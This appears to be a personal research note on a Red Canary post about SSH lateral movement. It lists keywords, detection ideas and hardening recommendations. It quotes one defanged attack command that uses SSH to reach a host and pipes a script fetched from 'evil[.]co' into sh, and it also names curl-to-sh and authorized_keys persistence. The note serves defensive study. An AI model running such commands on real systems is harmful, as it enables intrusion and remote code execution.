lateralmovementssh-lambert2020

2025-11-02

Lateral Movement with Secure Shell (SSH)

By: Tony Lambert

April 28, 2020

Red Canary

https://redcanary.com/blog/threat-detection/lateral-movement-with-secure-shell/

Notes
Red Canary
Zscaler
SSH
SSH malware
lateral movement
PsExec https://redcanary.com/blog/threat-detection/threat-hunting-psexec-lateral-movement/
https://redcanary.com/blog/threat-detection/stopping-emotet-before-it-moves-laterally/
Unix-like
SMB
RDP
OpenSSH
ssh command
Telnet
scp command
sftp command
FTP
ftp command
password authentication
ssh-keygen
authorized_keys
known_hosts
brute force
weak password
port 22
public key
sshd
SSH tunneling
bypassingnetworkrestrictionrdptunneling-mandiant2019
plink.exe
cli pattern detection: 127.0.0.1:3389
firewall
Evasion
MySQL
cryptocurrency miner
Linux malware
known_hosts as a host discovery tool for lateral movement
EDR
ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no root@10.10.10.10 ‘hxxp://evil[.]co/evilScript \ sh
YARA
VirusTotal LiveHunt
dropper script yara rule
curl -> sh
https://azure.microsoft.com/en-us/blog/learning-from-cryptocurrency-mining-attack-scripts-on-linux/
base64 as evasion technique
authorized_keys persistence
MFA
recommendation: enable MFA
HashKnownHosts
recommendation: use HashKnownHosts
recommendation: disable password authentication for SSH servers
https://goteleport.com/blog/how-to-ssh-properly/

Links to this note

Recent Posts